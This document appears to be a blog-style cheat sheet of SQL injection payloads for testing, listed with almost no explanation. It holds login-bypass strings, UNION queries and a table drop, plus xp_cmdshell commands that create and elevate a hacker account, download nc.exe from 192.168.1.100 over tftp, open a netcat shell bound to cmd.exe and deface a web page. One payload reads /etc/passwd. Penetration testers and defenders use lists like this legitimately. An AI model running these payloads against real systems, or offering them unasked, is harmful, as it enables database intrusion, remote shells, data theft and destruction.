Testing for SQL Injection
||6
‘||6’
(||6)
‘ OR 1=1–
OR 1=1
‘ OR ‘1’=’1
; OR ‘1’=’1′
%27+–+
“or 1=1–
‘ or 1=1 /*
or 1=1–
” or “a”=”a
Admin’ OR ‘
‘ having 1=1–
‘ OR ‘text’= N’text’
‘ OR 2>1
‘ OR ‘text’ > ‘t’
Password:/=1 ‘ or 1/
%22+or+isnull&2F1%2F0%29+%2F*
‘ group by userid having 1=1–
CREATE USER name IDENTIFIED BY ‘pass123’
‘; exec master..xp_cmdshell ‘ping 10.10.1.2’–
exec sp_addsrvrolemember ‘name’, ‘sysadmin’
GRANT CONNECT TO name; GRANT RESOURCE TO name;
‘//OR//1//=//1
‘ or 1 in (select @@version)–
‘ union all select @@version–
‘ OR ‘unusual’ = ‘unusual’
‘ OR ‘something’ like ‘some%’
‘ OR ‘whatever’ in (‘whatever’)
‘ OR 2 BETWEEN 1 and 3
‘ or username like char(37);
UNI//ON SEL//ECT
‘;EXEC(‘SEL’ + ‘ECT US’ + ‘ER’)
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
‘ and 1 in (select var from temp)–
‘; drop table temp –
exec sp_addlogin ‘name’, ‘password’
@var select @var as var into temp end —
SQL injection Queries Examples
‘
‘ or 1=1–
‘;insert into userinfo values (‘x’,’x’);–
‘;create database hacker;–
‘;exec master..xp_cmdshell “net user hacker hack /add”;–
‘;exec master..xp_cmdshell “net localgroup administrators hacker /add”;–
‘;exec master..xp_cmdshell “tftp -i 192.168.1.100 GET nc.exe”;–
‘;exec master..xp_cmdshell “nc -l -p 79 -d -e cmd.exe”;–
‘;exec master..xp_cmdshell “echo YOU ARE HACKED > c:\inetpub\wwwroot\default.htm”;–
‘;exec master..xp_cmdshell “cmd.exe /c calc.exe”;–
‘;use master’; exe sp_makewebtask ‘c:\inetpub\wwwroot\db.htm’, ‘select * from sysdatabases’;–
These examples have been left out because of WordPress issues with JSON:
‘ union select
’; EXECUTE IMMEDIATE ‘SEL’ || ‘ECT US’ || ‘ER’
‘ union select 1,load_file(‘/etc/passwd’,1,1,1;
‘union select * from users where login = char(114,111,111,116);